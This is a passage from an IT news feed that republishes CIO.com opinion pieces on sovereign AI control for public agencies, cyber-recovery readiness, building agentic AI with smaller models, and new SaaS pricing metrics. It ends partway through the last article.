<p class="wp-block-paragraph">Crucially, the framework doesn’t begin with technology or AI or even with data. It begins with the experiences the organization hopes to create for its customers, employees, or partners. Many AI initiatives start with the question, “What can this technology do?” And indeed, we need to be inspired by the possibilities and challenged to think differently by what the technology can do. But, Talasaz emphasizes, we also need to ask what experiences we need to deliver for our business and how the technology can make that a reality.</p>



<p class="wp-block-paragraph">The framework challenges CIOs to answer that question first. Only after the experiences are clearly defined does the conversation move to the capabilities required to deliver it, the business activities that support those capabilities, the AI and data products that enable them, and finally the data foundation that makes everything possible.</p>



<p class="wp-block-paragraph">This shift in perspective ensures that, rather than allowing technology investments to search for business value, the business experience defines the technology required to deliver it. For CIOs, that’s more than a planning exercise. It’s a fundamentally different way of leading.</p>



<p class="wp-block-paragraph"><em>Over the coming months, the P4P community will be convening a series of small CxO roundtables to explore these issues and work more deeply with Afshean Talasaz’s 6×6 Data and AI Framework. CIOs and other enterprise leaders interested in participating are welcome to <a href="mailto:droberts@ouellette-online.com?subject=P4P:%206x6%20Framework%20Roundtable">reach out to me directly</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sovereign AI has become the public-sector CIO’s control problem]]></title>
<description><![CDATA[In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving in...]]></description>
<link>https://tsecurity.de/de/3694400/it-security-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694400/it-security-nachrichten/sovereign-ai-has-become-the-public-sector-cios-control-problem/</guid>
<pubDate>Sat, 25 Jul 2026 18:57:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">In public-sector and regulated-cloud work, I learned that sovereignty rarely starts as a national strategy. It starts as an auditor’s question: Who can prove where the data went, which system made the decision and what changes when the vendor or infrastructure does? That question is now moving into AI, and most sovereign-AI debates answer the wrong version of it.</p>



<p class="wp-block-paragraph">They ask whether a country can build its own model on domestic data and hardware. For the United States and China, which together hold more than 90% of global AI data-center capacity, per a <a href="https://institute.global/insights/tech-and-digitalisation/sovereignty-in-the-age-of-ai-strategic-choices-structural-dependencies">January 2026 Tony Blair Institute analysis</a>, that question is worth asking. However, for almost every other government, it is the wrong place to start. The operative question is narrower: Once AI is embedded in public services, who controls the stack?</p>



<h2 class="wp-block-heading">The 5 layers of public-sector control</h2>



<p class="wp-block-paragraph">For a CIO, sovereign AI means enforceable control across the AI lifecycle; model ownership is a separate question. Control has five layers:</p>



<ul class="wp-block-list">
<li><strong>Data control:</strong> Where sensitive public data sits, and whether it can train a vendor’s model.</li>



<li><strong>Model control:</strong> Which models clear which workloads, and under what validation.</li>



<li><strong>Infrastructure control:</strong> Whether critical workloads run in approved environments.</li>



<li><strong>Operational control:</strong> Whether AI-assisted actions are logged, monitored and reversible.</li>



<li><strong>Vendor control:</strong> Whether the agency keeps portability, audit rights and a real exit.</li>
</ul>



<p class="wp-block-paragraph">Those five layers are the control plane for public-service AI. Floyd Dcosta recently made the enterprise case in “<a href="https://www.cio.com/article/4147102/ai-without-sovereignty-is-just-outsourced-intelligence.html">AI without sovereignty is just outsourced intelligence</a>”: capability is what a tool can do; authority over how and when it does it is something a buyer can quietly lose. For public services, losing that authority plays out in the public eye.</p>



<p class="wp-block-paragraph">Public-sector AI risk differs from enterprise risk. A retailer’s bad recommendation costs a sale; a government’s AI touches benefits, tax enforcement, policing and emergency response, raising the bar to due process, records retention and continuity of operations. A government that cannot reconstruct an AI-assisted decision lacks operational sovereignty, even in a domestic data center.</p>



<h2 class="wp-block-heading">Evaluating risk: Concentration, jurisdiction and shadow AI</h2>



<p class="wp-block-paragraph">Foreign dependency is a real risk, but the exposure that matters is a sudden cutoff: A model you cannot audit, switch or exit, shut off by someone else’s order. A vendor’s nationality is a poor guide to that risk; control is.  Two markers matter. The first is concentration. In July 2024, a single faulty CrowdStrike update <a href="https://www.cisa.gov/news-events/alerts/2024/07/19/widespread-it-outage-due-crowdstrike-update">crashed about 8.5 million Windows machines</a>, disrupting airlines, hospitals, banks and governments worldwide. No attacker was involved; one homogeneous dependency failed everywhere at once. The lesson points away from vendor nationality and toward uniformity as the fault line, making portability and provider diversity resilience controls.</p>



<p class="wp-block-paragraph">The second is jurisdiction. In June 2025, Microsoft’s legal director for France <a href="https://www.sdxcentral.com/news/microsoft-tells-french-lawmakers-it-cant-protect-user-data-from-us-demands/">told a Senate inquiry, under oath</a>, that it could not guarantee that French public-sector data, even in French data centers, would be protected against US demands under the 2018 CLOUD Act. No such request had been made, and EU data has stayed in the EU since January 2025; senators called the assurance purely declarative. For the most sensitive data, residency does not equal control; the parent’s jurisdiction can matter as much as the server’s. Three US hyperscalers hold <a href="https://www.srgresearch.com/articles/european-cloud-providers-local-market-share-now-holds-steady-at-15">about 70% of the European cloud market</a>, while European providers’ share fell from 29% in 2017 to roughly 15%. Concentration plus jurisdiction is the exposure a CIO must price. I have watched teams treat vendor selection as the moment risk was solved; it rarely was.</p>



<p class="wp-block-paragraph">The wrong response is self-isolation. Most countries will never build frontier models, advanced chips, hyperscale clouds and talent pipelines at once; the Tony Blair Institute calls full self-sufficiency “too expensive, too slow and, for most countries, simply impossible.” The better test is workload sensitivity. Low-risk uses, such as drafting, translation and summarization, can run on commercial platforms with controls; high-risk uses, such as benefits eligibility, fraud investigation and healthcare triage, demand stricter control over data, model behavior and auditability.</p>



<p class="wp-block-paragraph">Mandating domestic-only provision before a competitive option exists inverts sovereignty. <a href="https://europe2031.ai/summary">Europe 2031</a>, a five-year scenario from June 2026 by European technologists and policy researchers, illustrates the failure mode: A 2027 “buy European” mandate lands as offensive cyber capability spreads, and agencies that switched to weaker providers are locked out and paying ransoms. The scenario is fiction; the mechanism is not. Leverage comes from being indispensable, not half-hearted self-sufficiency. The closer-to-home effect is shadow AI: Mandate an inferior sanctioned tool and staff bypass it, the way shadow IT grows up around tools people find too slow. A rule that pushes sensitive work into ungoverned shadow AI reduces control instead of adding it.</p>



<p class="wp-block-paragraph">Regulation and data-residency rules belong in any serious strategy, but carry failure modes. Blanket localization raises hosting costs and slows adoption without guaranteeing control, and a “sovereign cloud” on a foreign parent’s stack can amount to sovereignty theater. The more useful pattern tiers requirements by sensitivity. India’s BHASHINI shows the application layer done well: A public platform <a href="https://www.pib.gov.in/PressReleaseIframePage.aspx?PRID=2093333&amp;reg=3&amp;lang=2">serving 100 million-plus inferences a month across 22-plus languages</a> on a vendor- and cloud-agnostic design that keeps data and switching rights public. Sovereignty resides in the portability, not in a national model.</p>



<h2 class="wp-block-heading">Building an operational sovereignty strategy</h2>



<p class="wp-block-paragraph">Public trust is the constraint sovereignty rhetoric tends to skip. The OECD’s <a href="https://www.oecd.org/en/publications/governing-with-artificial-intelligence_795de142-en.html">2025 review of government AI</a> warns that opaque systems make AI-assisted decisions hard to explain and can give public servants false confidence in tools that fail quietly. State-controlled AI is the same problem from the other side: A government that deploys models against its own citizens without audit or record has gained control and lost accountability. An agency that can log, explain and reverse an AI-assisted action can defend it to citizens, courts, auditors and elected officials. If it cannot, it has bought access and called it sovereignty.</p>



<p class="wp-block-paragraph">None of this is new. AI sovereignty repeats earlier fights over cloud, telecom, semiconductors and cybersecurity. Europe’s flagship cloud project, GAIA-X, became a cautionary tale; the Dutch technologist Bert Hubert called it an <a href="https://berthub.eu/articles/posts/gaia-x-is-an-expensive-distraction/">“expensive distraction”</a> that produced no European cloud, the familiar result of ambition without absorptive capacity. Cloud taught governments that outsourcing infrastructure does not outsource accountability; telecom, that vendor dependency becomes strategic exposure; chips, that supply chains matter before a crisis; cybersecurity, that trust must be verified continuously. AI inherits all four at once.</p>



<p class="wp-block-paragraph">Over the next five to ten years, some countries will build national platforms, more will build trusted cloud and trusted model regimes, and most will run hybrids that pair domestic data control with global model access. Trade policy will harden those choices: Export controls on compute and data-localization rules will pull the vendor market into blocs that track alliances more than open markets. For a CIO, that turns a vendor and hosting decision into a five-year bet on whose rules and supply chains will still hold. The ones that succeed will treat sovereignty as an operating requirement, backed by leverage, not a slogan. Start with the control plane before the model: Most agencies will never own the model, and the controls are what decide whether the AI they do run stays accountable. Even when procurement policy is dictated from above, these questions remain within the CIO’s authority:</p>



<ol start="1" class="wp-block-list">
<li>Can we classify AI workloads by public-service risk?</li>



<li>Can we prove where sensitive data goes across training, retrieval, inference, logging and retention?</li>



<li>Can we restrict which models are approved for which data classes and functions?</li>



<li>Can we reconstruct an AI-assisted action in enough detail to explain it?</li>



<li>Can we change providers without losing continuity or institutional knowledge?</li>



<li>Can we explain the system to citizens, regulators, auditors and elected officials?</li>
</ol>



<p class="wp-block-paragraph">A “no” to any of these does not mean the agency lacks AI. It means the agency has access it does not yet control. Public institutions can use global innovation without surrendering public authority, but only once they know what to hold, what to rent and where dependency turns into risk.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Principles every enterprise must test before the attack arrives]]></title>
<description><![CDATA[I haven’t slept much in the past few weeks. Not because of some theoretical cyber risk that keeps many executives awake, but because reality just delivered a real wake-up call to our industry — a call that every executive must answer, now.



Imagine this: A major global enterprise, a company mos...]]></description>
<link>https://tsecurity.de/de/3694398/it-security-nachrichten/principles-every-enterprise-must-test-before-the-attack-arrives/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694398/it-security-nachrichten/principles-every-enterprise-must-test-before-the-attack-arrives/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I haven’t slept much in the past few weeks. Not because of some theoretical cyber risk that keeps many executives awake, but because reality just delivered a real wake-up call to our industry — a call that every executive must answer, now.</p>



<p class="wp-block-paragraph">Imagine this: A major global enterprise, a company most of us interact with indirectly every single day, wakes up to find its entire digital environment obliterated. Thousands of employees in dozens of offices and remote locations are suddenly offline. Customers are cut off, supply chains grind to a halt and regulators are notified with a chilling admission: “We have no idea when we’ll be back.”</p>



<p class="wp-block-paragraph">This wasn’t ransomware. There was no negotiation, no decryption key to buy, no easy way out. It was destruction — deliberate, coordinated and geopolitically motivated — not monetary.</p>



<p class="wp-block-paragraph">As a chief customer officer who’s worked with countless customers on cyberattack risks, my perspective hits a bit differently than a CISO or a CTO. I see the aftermath, not just the attack surface. I see the faces behind the tickets, the operations team locked out of their own systems, the support agent answering panicked calls at dawn. And I ask: How many organizations have actually stress-tested their response to this scenario — not a hypothetical, but this very real, lights-out event? Here’s what every leader needs to confront today:</p>



<h2 class="wp-block-heading">Recovery is not just a technical exercise</h2>



<p class="wp-block-paragraph">The first assumption to break during a real crisis is <a href="https://www.cio.com/article/4165019/your-cloud-strategy-is-incomplete-without-a-cyber-recovery-plan.html">the belief that recovery is purely technical</a>.</p>



<p class="wp-block-paragraph">Many organizations have done tabletop exercises and have a backup and recovery playbook, so they feel prepared. They can <a>point to</a> backup windows, retention schedules and immutability controls. The moment a true blackout happens, a different reality surfaces. The people who own the recovery steps either do not know each other, lack the authority to make decisions without supervisor approval or need guidance from offline systems.</p>



<p class="wp-block-paragraph">The reality is that technical infrastructure almost always holds up better than human infrastructure. Organizations have built their recovery strategy around the assumption that someone competent will be awake, available and empowered when a cyber event happens.</p>



<p class="wp-block-paragraph">Still, backups are only as good as their independence. Let’s be blunt: If your recovery infrastructure shares identity, authentication or network trust with your Microsoft tenant (such as Azure, Microsoft 365 or Teams), you don’t actually have a recovery plan; you have a false sense of one — and a liability. A <a href="https://www.veeam.com/company/press-release/veeam-report-reveals-a-market-wide-shift-from-recovery-confidence-to-proven-data-resilience-amid-ransomware-threats-and-ai-adoption.html">recent survey</a> found that while 90% of organizations express confidence in their ability to recover from a cyber incident, fewer than one in three ransomware victims fully recovered their data.</p>



<p class="wp-block-paragraph">True resilience means immutable, air-gapped backups, untouchable by the same compromise. Anything less is an illusion. I talk to customers about their recovery plans constantly. The customers who have rehearsed all scenarios sleep soundly. Those who haven’t? They’re rolling the dice.</p>



<h2 class="wp-block-heading">Most business continuity plans ignore ‘total blackout’</h2>



<p class="wp-block-paragraph">I’ve reviewed hundreds of business continuity plans. Almost all assume partial failures — a region, an application, a data center. But what if every system, in every country, goes dark simultaneously? That’s an entirely different playbook. If your team hasn’t run a drill for a global, simultaneous outage, you’re not prepared. The probability is low, but the cost of being unready is existential.</p>



<p class="wp-block-paragraph">Connected devices, OT systems, field hardware, partner integrations — they all plug into your enterprise network. When the core collapses, it’s not just IT at risk. It’s operational technology, physical safety systems and in regulated sectors, potentially human lives. Understanding and testing those interdependencies is non-negotiable.</p>



<p class="wp-block-paragraph">This is also where boards need to change the conversation. A <a href="https://www.diligent.com/resources/research/cybersecurity-audit">study found</a> that only 5% of companies have cybersecurity experts on their board of directors. Recovery time objectives (RTOs) should not be buried in technical appendices. It’s all jargon to boards. That makes translation essential. RTOs must be explained in terms of business impact. “We can recover in four hours” is a technical statement. “Every hour of downtime costs us $2.3M and creates regulatory exposure in three jurisdictions” is a board statement.</p>



<p class="wp-block-paragraph">That is the level of clarity leaders need.</p>



<p class="wp-block-paragraph">The most prepared organizations do not wait for an incident to educate the board. They bring the conversation forward proactively. They frame recovery in business terms: revenue, regulatory standing, customer trust and brand reputation.</p>



<p class="wp-block-paragraph">The most effective framing is often simple. Show the most critical systems. Show what happens if each one is down for one hour, four hours, 24 hours and 72 hours. Show the current recovery capability against each and then show the gap.</p>



<p class="wp-block-paragraph">If your board is not demanding real answers, your business continuity strategy is likely underfunded and your business is exposed. This is a risk conversation worth forcing because the consequences do not stay inside IT. They can show up in customer churn or missed revenue and ruin an organization’s reputation.</p>



<h2 class="wp-block-heading">Threat intelligence must be actionable, not archived</h2>



<p class="wp-block-paragraph">Geopolitical attacks, hacktivist campaigns and nation-state targeting aren’t abstract threats. They are active risks, and that intelligence cannot languish in the security team’s inbox. Executive leadership must be looped in — and immediately — so gaps can be closed before they’re exploited. Too often, intelligence enters the security operations function and never reaches the teams responsible for recovery infrastructure or executive decision-making.</p>



<p class="wp-block-paragraph">If a threat actor is targeting a specific class of backup agents, the team responsible for those agents needs to know now, not two weeks from now. If intelligence suggests destructive activity against a sector, recovery owners need to validate isolation, access paths and restoration procedures immediately. If geopolitical tension increases the likelihood of targeting, executive leadership needs to understand what exposure exists and what actions are being taken. The organizations that survive aren’t just the best at incident response. They’re the ones who anticipated, rehearsed and invested <em>before</em> the attack.</p>



<p class="wp-block-paragraph">Part of investing in a recovery strategy requires closing the loop between signal and action. The most prepared organizations have already mapped their critical recovery dependencies to specific threat categories. When intelligence touches one of those categories, there is a named owner and a clear set of actions. No guessing or forwarding emails into the void is needed because the distance between the warning and the employees’ ability to do something is shortened.</p>



<p class="wp-block-paragraph">Looking ahead, the conversation will continue to evolve beyond traditional cyber response. Because in an AI-enabled enterprise, the new question is whether the data within those systems can still be trusted. When AI systems make decisions based on enterprise data, the attack surface becomes the data’s accuracy. A threat actor who quietly corrupts a dataset over 90 days before a recovery event has done more damage than just downtime. They can poison the inputs driving decisions across the business.</p>



<p class="wp-block-paragraph">Regardless of how AI will change threat intelligence and cyber response, these principles remain the same. Know your problem, whether structural or technological. Ensure your human infrastructure keeps pace with your technical infrastructure, with clear cross-functional ownership and the tools and knowledge to act autonomously. Communicate with your boards often — and correctly.</p>



<p class="wp-block-paragraph">Let’s not wait for the next headline to ask, “Are we ready?” Have those conversations <em>now</em>. Test your assumptions. Close your gaps. Because in today’s threat landscape, resilience isn’t IT’s job — it’s everyone’s mandate.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Smaller, smarter, safer: How to build agentic AI on the right foundation]]></title>
<description><![CDATA[When it comes to building an effective AI stack, context is king and power isn’t everything it’s cracked up to be.



“Smaller, smarter, safer — this is a bet our company has taken in how we deploy AI internally,” said Ricky Thakrar, head of sales and account management at Zoho, provider of a sui...]]></description>
<link>https://tsecurity.de/de/3694397/it-security-nachrichten/smaller-smarter-safer-how-to-build-agentic-ai-on-the-right-foundation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694397/it-security-nachrichten/smaller-smarter-safer-how-to-build-agentic-ai-on-the-right-foundation/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When it comes to building an effective AI stack, context is king and power isn’t everything it’s cracked up to be.</p>



<p class="wp-block-paragraph">“Smaller, smarter, safer — this is a bet our company has taken in how we deploy AI internally,” said Ricky Thakrar, head of sales and account management at Zoho, provider of a suite of popular cloud-based software solutions for sales, marketing, and finance.</p>



<p class="wp-block-paragraph">“I’m on the business side, and so decisions made by our CIO and IT folks affect me directly, and my teams’ workflows and processes,” he added.</p>



<p class="wp-block-paragraph">Speaking to a room of tech leaders at the <a href="https://event.foundryco.com/cio-100-leadership-live-new-york/">CIO 100 Leadership Live New York event</a> last week, Thakrar explained that every company wants the speed of AI-generated work wedded to the quality of human work, even though these two are diametrically opposed. No amount of model upgrades or spend will close that gap, so the only way forward is to architect your way out. Thakrar encapsulated this idea in a simple formula:</p>



<ul class="wp-block-list">
<li>Smaller: Stop deploying maximum firepower on every task. Many tasks don’t need it.</li>



<li>Smarter: The system around the model decides more than the model does.</li>



<li>Safer: Verify at the point a mistake gets locked in, not just downstream of it.</li>
</ul>



<p class="wp-block-paragraph">He noted that organizations that win with AI won’t be those deploying the biggest, most powerful models or the most sophisticated architecture, but the ones that figure out that the model is the easy part and the right architecture is harder. That means understanding the hardest element, and the biggest differentiator, is building a human system that learns and compounds alongside agentic systems.</p>



<p class="wp-block-paragraph">To get it right, organizations need to prioritize the context layer. The size of frontier models like the GPT series, Claude, and Gemini mostly exist to compensate for missing context, Thakrar explained. Without enough context, models need to be able to reason harder and infer more about what a user actually means because it doesn’t know the user’s account, process, or history. A rich context layer makes it possible for enterprises to run workloads on much smaller, lower-power models.</p>



<p class="wp-block-paragraph">“The intelligence moves from the model into the architecture around it,” he said.</p>



<h2 class="wp-block-heading">A steep learning curve</h2>



<p class="wp-block-paragraph">One of Zoho’s earliest AI agents was a churn management agent to help the account management team detect churn in customer subscriptions. So when a subscription became inactive, the agent would collect context from notes, meeting recordings, and Zoho’s data enrichment tool, then create a summary of reasons the account might have churned, and schedule a call.</p>



<p class="wp-block-paragraph">“What happened was I got this churn agent a couple months later, already embedded in our CRM, and within a week my team no longer trusted that agent,” Thakrar said. “The reason is we forgot to collect one very key point.”</p>



<p class="wp-block-paragraph">In Zoho’s CRM, when a customer buys a bundle of products, that bundle is represented as a single line item. That means the status of any products the customer may have previously purchased individually changes to inactive as they’re moved to the bundle. That’s not churn, but it was interpreted it that way. Zoho fixed it in the second version of the agent.</p>



<p class="wp-block-paragraph">Then a new problem arose. Many potential customers first purchase Zoho products as pilots or sandboxes. As those customers move from pilot to live instance, they close down the pilot versions. And again, the CRM would record that as subscriptions going inactive.</p>



<p class="wp-block-paragraph">“The trust deteriorates again because everyone got excited for version 2,” Thakrar said.</p>



<p class="wp-block-paragraph">Sometimes, a certain product might not be the best fit for a customer and Thakrar’s team will suggest the customer move to another product. That’s deliberate churn, not a churn risk.</p>



<p class="wp-block-paragraph">“You may have a similar story like this where the agent sounds so good, it’s going to do something quick and add value, but it’s missing context from the account managers, and there are so many more pieces we’re still building out,” Thakrar said. “It’s been almost a year and the problem I have is my team still doesn’t trust it. They’ll see [a message from the agent] and go out and do all the research anyway to make sure it gave the correct answer.”</p>



<p class="wp-block-paragraph">The team is more on top of potential churn, though, but the promised productivity gains have yet to materialize because the agent has to earn back lost trust due to a lack of context.</p>



<p class="wp-block-paragraph">“My goal for this year is having an AI-assisted customer journey from sales to account management where the handoff is clean, the context flows, and every piece of information we gather about a customer is weighed, identified, and coached so the sales team can close more deals,” he said.</p>



<p class="wp-block-paragraph">Zoho’s early experience with agents has led to the idea that constrained, context-rich, deterministic architectures consistently outperform expensive models bolted onto fragmented systems. It all comes down to three pillars: routing, harness, and specialization.</p>



<h3 class="wp-block-heading">Routing</h3>



<p class="wp-block-paragraph">Routing is about sending workloads to the proper model for the job, which entails providing enough context to a given task that a small, cheap model can handle it without the need for spare reasoning capacity to fill gaps.</p>



<p class="wp-block-paragraph">Frontier models are expensive and companies can burn through a year’s budget worth of tokens in months. But most tasks can be handled by much smaller, more constrained models at a fraction of the cost.</p>



<p class="wp-block-paragraph">“You don’t always have to pay the frontier guys for every task,” he said. “We’ve observed with some clients that we could save them 95% with a 3 billion parameter model.”</p>



<h3 class="wp-block-heading">Harness</h3>



<p class="wp-block-paragraph">An AI agent harness is the software infrastructure scaffolding around an LLM that differentiates an agent from a chatbot. It’s what enables an agent to act on tasks rather than simply respond to prompts. A model reasons through a problem and decides what to do about it. The harness connects the model to the tools, systems, memory, guardrails, and execution environments required to perform the actions determined by the model. The term is frequently used more or less interchangeably with orchestration layer.</p>



<p class="wp-block-paragraph">“It’s the process around the model, which matters way more than the model itself,” Thakrar said.</p>



<p class="wp-block-paragraph">In benchmark tests, a superior harness on a less powerful model produces better results than an inferior harness on a much bigger model.</p>



<p class="wp-block-paragraph">For the best results, Thakrar said, it’s essential to understand the deterministic and non-deterministic elements of a given workload, and build that into the architecture. Machines can read, organize, and validate, and they excel at deterministic tasks. Humans, on the other hand, are exceptional at non-deterministic tasks like judging, synthesizing, and deciding.</p>



<p class="wp-block-paragraph">Those non-deterministic tasks in a process are the ideal point for AI agents to incorporate a human in the loop, what Thakrar calls human harness. He pointed to a stakeholder mapping agent Zoho built for sales as an example, which takes the context of an initial meeting and third-party enriched data like a LinkedIn profile, weighs probabilities, and makes an educated guess about the stakeholder map.</p>



<p class="wp-block-paragraph">“The initial goal was just to eliminate that task completely from the human workflow,” he said. “The stakeholder map is done, it’s in the folder, and you can look at it.”</p>



<p class="wp-block-paragraph">But the agent would struggle to capture nuance. The meanings of titles in organizations always vary, and the politics and dynamics of any given meeting can be difficult for an AI agent to discern. Rather than keep feeding the agent data to try to make it intelligent enough to make those determinations, it was simpler and more efficient for the agent to create a proposed stakeholder map and hand it over to a human who could make changes and explain why those changes were necessary.</p>



<p class="wp-block-paragraph">Ultimately, Thakrar said the agent still saved human team members time because the stakeholder map was usually pretty close, and the corrections also helped the model grow smarter by adding richer context.</p>



<h3 class="wp-block-heading">Specialization</h3>



<p class="wp-block-paragraph">Specialization is transitioning a process from testing on a frontier model to production on a much narrower, smaller model. Once you’ve proven that an agent can do a job well, you want to stop paying master-craftsman rates to keep doing that one job well.</p>



<p class="wp-block-paragraph">Specialization is all about capturing your subject matter experts’ best judgement and pattern recognition to build an open-weight, open source, trained, and fine-tuned model that can be deployed in your own data center.</p>



<p class="wp-block-paragraph">“The true enterprise bet is to keep that orchestration layer, which is your IP and knowledge, in house,” Thakrar said. “You don’t want to host that on someone else’s model. The goal of everyone in enterprise should be to run, train, and host their own models.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new value architecture of the AI-native SaaS era]]></title>
<description><![CDATA[The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.



In brief:




AI is transforming software as a service (SaaS), and the old ways of keeping score no longer apply.



Smart companies are evolving new metrics that provide deep...]]></description>
<link>https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694395/it-security-nachrichten/the-new-value-architecture-of-the-ai-native-saas-era/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The traditional methods of measuring success no longer tell the full story. Here’s what should replace them — and why.</p>



<p class="wp-block-paragraph">In brief:</p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is transforming software as a service (SaaS)</a>, and the old ways of keeping score no longer apply.</li>



<li>Smart companies are evolving new metrics that provide deeper insight into how AI-native software is performing in a new marketplace.</li>



<li>These changes impact everything from pricing to valuations.</li>
</ul>



<p class="wp-block-paragraph">The transformation of the software-as-a-service (SaaS) industry toward AI-native operating companies is rapidly changing the unit of value across the industry.</p>



<p class="wp-block-paragraph">The traditional metric of seats — which measured access — is rapidly giving way to credits designed to measure work performed. This evolution is upending the industry in multiple ways, impacting everything from pricing to enterprise valuations.</p>



<p class="wp-block-paragraph">While many companies still cling to seat-based metrics to measure growth, efficiency and durability, the future is likely to be one in which companies utilize a <a href="https://www.cio.com/article/4184688/it-hurtles-toward-the-great-enterprise-pricing-reset.html">credit-centric metrics framework</a>, with seats and outcomes as the bookends of a spectrum.</p>



<h2 class="wp-block-heading">Why do software companies need new metrics?</h2>



<p class="wp-block-paragraph">Why the rethink, and why now? There are five major forces that are driving this shift:</p>



<ol start="1" class="wp-block-list">
<li><a href="https://www.idc.com/resource-center/blog/is-saas-dead-rethinking-the-future-of-software-in-the-age-of-ai/"><strong>The unit of value is changing</strong></a><strong>.</strong> Seats measured who could access software, and credits measure what the software actually does. But in an AI-native world, agents don’t have seats; they have workloads. Over the past 18 months, every major SaaS platform has moved to some forms of credit or consumption unit.</li>



<li><strong>The cost of goods sold (COGS) is exploding.</strong> AI inference adds real per-unit costs that scale with usage. In an AI-native world, software companies can’t scale to infinite users at near‑zero marginal cost as before.</li>



<li><strong>Buying is moving up the org chart.</strong> AI-native applications shift purchasing to higher-level operators — such as line-of-business leaders or chief operating officers — which expands the market from software budgets to labor budgets. And because AI agents replace services as well as software, the total market opportunity is 3x to 10x larger than traditional SaaS.</li>



<li><strong>Time to value (TTV) is collapsing.</strong> With AI-native tools, customers start seeing meaningful results in weeks rather than quarters. Onboarding and setup are fast, workflows are pre-built, and there’s no need for extensive customer success or professional services — dramatically reducing implementation time and costs.</li>



<li><strong>Retention is bifurcating.</strong> AI forces clarity in a way that traditional SaaS couldn’t. Products that can provide value become even “stickier” and retain customers. Those that don’t churn faster. In an AI-native marketplace, the middle disappears.</li>
</ol>



<h2 class="wp-block-heading">How this shift is impacting pricing</h2>



<p class="wp-block-paragraph"><a href="https://www.ey.com/en_us/insights/strategy/grow-with-trusted-software-portfolio-management">Given how AI-native software is transforming the market</a>, the shift to more variable pricing options is inevitable.</p>



<p class="wp-block-paragraph">Seats won’t go away completely. Subscription pricing based on the number of users is stable and predictable and will continue to work for some customers. Tokens — the use of pass-through pricing for underlying compute — will fit those customers where the AI feature is commoditized or the buyer wants transparency into costs.</p>



<p class="wp-block-paragraph">Credits will likely become the dominant architecture because they provide a simple metric for both customers and providers. The vendor sets the conversation ratio between credits and underlying compute, shielding the customer from inference cost details. Credits are easy to understand and can be packaged into annual contracts for multiple features and products.</p>



<p class="wp-block-paragraph">Finally, the industry will likely see <a href="https://www.gartner.com/en/newsroom/press-releases/2026-07-01-gartner-says-us-dollars-234-billion-in-enterprise-application-software-spend-is-at-risk-from-agentic-artificial-intelligence">some move toward outcome-based pricing</a> for results such as resolved tickets, recovered revenue or qualified leads. This strategy will mostly be limited to verticals where it is easy to prove AI impacted the result.</p>



<p class="wp-block-paragraph">Where a software vendor sits on this spectrum is a signal of differentiation and pricing power. Credits are where most defensible AI-native businesses are landing because they balance customer predictability with vendor margin control.</p>



<h2 class="wp-block-heading">How AI upends classic SaaS metrics</h2>



<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



